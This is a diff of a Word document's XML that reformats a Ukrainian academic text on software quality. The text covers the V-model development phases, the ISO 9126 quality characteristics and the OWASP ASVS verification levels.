-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>проектування</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>, які передують кодування, після якого йдуть фази тестування. Пунктирні лінії означаают, що ці фази необхідно розглядати паралельно.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3119,7 +3041,6 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D34EFBD" wp14:editId="6829F3FB">
             <wp:extent cx="4752975" cy="2724150"/>
@@ -3262,6 +3183,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Фази V-подібної моделі</w:t>
       </w:r>
     </w:p>
@@ -3407,7 +3329,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>розробка програмного коду - виконується перетворення алгоритмів, визначених на етапі деталізований проектування, в готове ПО;</w:t>
       </w:r>
     </w:p>
@@ -3544,6 +3465,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>виробництво, експлуатація та супровід - ПО запускається у виробництво. На цій фазі передбачені також модернізації та внесення поправок;</w:t>
       </w:r>
     </w:p>
@@ -3614,19 +3536,6 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3685,17 +3594,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> проектування. Фази інтеграції та тестування реалізують архітектурне проектування або проектування на вищому рівні. Фаза </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>тестування системи підтверджує правильність виконання етапу вимог до продукту і його специфікації;</w:t>
+        <w:t xml:space="preserve"> проектування. Фази інтеграції та тестування реалізують архітектурне проектування або проектування на вищому рівні. Фаза тестування системи підтверджує правильність виконання етапу вимог до продукту і його специфікації;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3847,6 +3746,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>модель проста у використанні (щодо проекту, для якого вона є прийнятною).</w:t>
       </w:r>
     </w:p>
@@ -3884,18 +3784,6 @@
         </w:rPr>
         <w:t>Недоліки V-подібної моделі</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4135,7 +4023,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>З</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
@@ -4281,7 +4168,16 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> для досягнення високої якості програмного забезпечення, які передбачають адаптацію наявних і створення нових ручних і автоматичних процедур, що дозволяють контролювати </w:t>
+        <w:t xml:space="preserve"> для досягнення високої якості програмного забезпечення, які передбачають адаптацію наявних і </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">створення нових ручних і автоматичних процедур, що дозволяють контролювати </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -4453,7 +4349,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>ОГЛЯД</w:t>
       </w:r>
       <w:r>
@@ -4502,7 +4397,6 @@
         <w:ind w:firstLine="708"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -4511,12 +4405,75 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">Якість програмого забезпечення це абстрактне поняття. Її присутність не завжди легко помітити, але відсутність помічається відразу. </w:t>
+        <w:t xml:space="preserve">Згідно до міжнародного стандарту </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>ISO 9126[1]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>як</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>сть програмного дод</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>атку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> можна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> описати, як спроможність програмного продукту при заданих умовах відповідати встановленим та очікуваним вимогам зацікавлених сторін.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4537,29 +4494,25 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">Згідно до міжнародного стандарту </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-        </w:rPr>
-        <w:t>ISO 9126[1]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
+        <w:t xml:space="preserve">При розгляді якості програмного забезпечення з точки зору того ж стандарту </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ISO</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>як</w:t>
+        <w:t xml:space="preserve"> 9126 [1-4] </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4568,31 +4521,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>і</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>сть програмного дод</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>атку</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> можна</w:t>
+        <w:t>можна виділити поняття внутрішньої якості, яка пов</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4601,20 +4530,17 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> описати, як спроможність програмного продукту при заданих умовах відповідати встановленим та очікуваним вимогам зацікавлених сторін.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="708"/>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">язана з характеристиками ПЗ самого по собі, без урахування його поведінки, зовнішньої якості, що характеризує ПЗ з точки зору його поведінки, та якості ПЗ при використанні в різних умовах – та якість, яку відчуває користувач за конкретних сценаріїв роботи ПЗ. Для всіх цих поглядів на якість було введено метрики, які дозволяють оцінити його. Також при розробці якісного ПЗ важливою є якість технологічних процесів його </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4622,52 +4548,8 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">При розгляді якості програмного забезпечення з точки зору того ж стандарту </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ISO</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 9126 [1-4] </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>можна виділити поняття внутрішньої якості, яка пов</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">язана з характеристиками ПЗ самого по собі, без урахування його поведінки, зовнішньої якості, що характеризує ПЗ з точки зору його поведінки, та якості ПЗ при використанні в різних умовах – та якість, яку відчуває користувач за конкретних сценаріїв роботи ПЗ. Для всіх цих поглядів на якість було введено метрики, які дозволяють оцінити його. Також при розробці якісного ПЗ важливою є якість технологічних процесів його розробки. Відношення між цими складовими якості по схемі, прийнятій в </w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">розробки. Відношення між цими складовими якості по схемі, прийнятій в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4868,17 +4750,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">використовує для опису внутрішньої та зовнішньої якості ПЗ багаторівневу модель. На верхньому рівні виділено 6 основних </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">характеристик якості ПЗ. Кожна характеристика описана за допомогою атрибутів, що до неї входять. У кожного атрибута є набір метрик, що дозволяє оцінити цей атрибут. На Рис. 1.2 наведено набір характеристик та атрибутів , визначених в </w:t>
+        <w:t xml:space="preserve">використовує для опису внутрішньої та зовнішньої якості ПЗ багаторівневу модель. На верхньому рівні виділено 6 основних характеристик якості ПЗ. Кожна характеристика описана за допомогою атрибутів, що до неї входять. У кожного атрибута є набір метрик, що дозволяє оцінити цей атрибут. На Рис. 1.2 наведено набір характеристик та атрибутів , визначених в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5021,6 +4893,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
         <w:t xml:space="preserve">Нижче приведено визначення цих характеристик та атрибутів по стандарту </w:t>
       </w:r>
@@ -5225,7 +5098,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> Відповідність стандартам і правилам (compliance). Відповідність ПО наявними індустріальним стандартам, нормативним і законодавчим актам, іншим регулюючим нормам.</w:t>
       </w:r>
     </w:p>
@@ -5450,6 +5322,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Зручність використання (usability) або практичність. Здатність ПЗ бути зручним в навчанні і використанні, а також привабливим для користувачів.</w:t>
       </w:r>
     </w:p>
@@ -5560,7 +5433,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Відповідність стандартам зручності використання (usability compliance).</w:t>
       </w:r>
     </w:p>
@@ -5735,6 +5607,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>аналізований (analyzability) або зручність проведення аналізу. Зручність проведення аналізу помилок, дефектів і недолі</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -5904,7 +5777,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Адаптируемость (adaptability). Здатність ПЗ пристосовуватися до </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -6230,6 +6102,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:br/>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -6398,7 +6271,6 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4502638" cy="3101630"/>
@@ -6591,7 +6463,27 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Додаток досягає ASVS 1-го рівня (або опортуністичних), якщо він адекватно захищає від вразливостей безпеки додатків, які легко виявити, і включені в OWASP Top 10 і інших подібних контрольних списків.</w:t>
+        <w:t>Додаток дос</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ягає ASVS 1-го рівня</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, якщо він адекватно захищає від вразливостей безпеки додатків, які легко виявити, і включені в OWASP Top 10 і інших подібних контрольних списків.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6623,7 +6515,19 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">Рівень 1 зазвичай підходить для додатків, де потрібна низька впевненість у правильному використанні засобів контролю безпеки або для швидкого аналізу парку корпоративних додатків або сприяння в розробці пріоритетного списку вимог безпеки в рамках багатофазного зусилля. </w:t>
+        <w:t xml:space="preserve">Рівень 1 зазвичай підходить для додатків, де потрібна низька впевненість у </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">правильному використанні засобів контролю безпеки або для швидкого аналізу парку корпоративних додатків або сприяння в розробці пріоритетного списку вимог безпеки в рамках багатофазного зусилля. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6716,7 +6620,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6729,6 +6632,16 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>досягає</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6739,7 +6652,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ASVS 2-</w:t>
+        <w:t>ASVS</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6749,6 +6662,16 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t xml:space="preserve"> 2-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t>го</w:t>
       </w:r>
       <w:r>
@@ -6758,7 +6681,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6791,7 +6713,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
@@ -6812,7 +6733,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6833,7 +6753,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">), </w:t>
       </w:r>
@@ -6854,7 +6773,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6875,7 +6793,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6896,7 +6813,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6917,7 +6833,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6938,7 +6853,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6959,7 +6873,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6980,7 +6893,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -7001,7 +6913,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
@@ -7022,7 +6933,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7043,7 +6953,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7064,7 +6973,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7085,7 +6993,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7106,7 +7013,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
@@ -7118,18 +7024,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Рівень 2 забезпечує контроль безпеки на місці, ефективний і </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">використовується в додатку. </w:t>
+        <w:t xml:space="preserve">Рівень 2 забезпечує контроль безпеки на місці, ефективний і використовується в додатку. </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -7214,7 +7109,59 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>ASVS Рівень 3 є високий рівень контролю в межах рівня ASVS.This, як правило, зарезервовані для додатків, що вимагають значних рівнів перевірки безпеки, таких, як ті, які можуть бути знайдені в районах військових, охорони здоров'я і безпеки, життєво важливої ​​інфраструктури і т.д. організацій може знадобитися ASVS 3-го рівня для додатків, що виконують критично важливі функції, де збій може істотно вплинути на діяльність організації, і навіть її живучість. Приклад вказівки по застосуванню ASVS Level 3 представлена ​​нижче. Додаток досягає ASVS 3-го рівня (або Advanced), якщо він адекватно захищає від передових вразливостей безпеки додатків, а також демонструє принципи хорошого дизайну безпеки.</w:t>
